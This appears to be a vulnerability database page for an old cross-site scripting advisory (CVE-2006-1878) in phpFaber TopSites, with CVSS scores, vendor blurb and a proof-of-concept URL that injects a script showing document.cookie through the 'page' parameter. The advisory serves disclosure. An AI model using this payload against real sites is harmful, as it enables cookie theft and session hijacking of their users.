phpFaber TopSites Script Cross-Site Scripting

2006.04.23

Credit: botan linuxmail org

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-1878

CWE: CWE-Other

CVSS Base Score: 2.6/10

Impact Subscore: 2.9/10

Exploitability Subscore: 4.9/10

Exploit range: Remote

Attack complexity: High

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Description :
phpFaber TopSites is a feature-packed, reliable and secure Top List coded in PHP and mySQL. phpFaber TopSites has proven its reliability time and time again under the most active server environments. Our feature list is large, including all elements you need to easily maintain your list, and even make money of it.
phpFaber TopSites can be integrated with all your favourite applications to save you the hassle of running two separate user systems. phpFaber TopSites includes what you expect from a Top List and much much more. It is fully customizable and doesn't require any programming skills! You can create your topsite just in 3 clicks!
Vulnerable :
http://www.example.com/index.php?page=<script>alert(document.cookie)</sc
ript>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

phpFaber TopSites Script Cross-Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.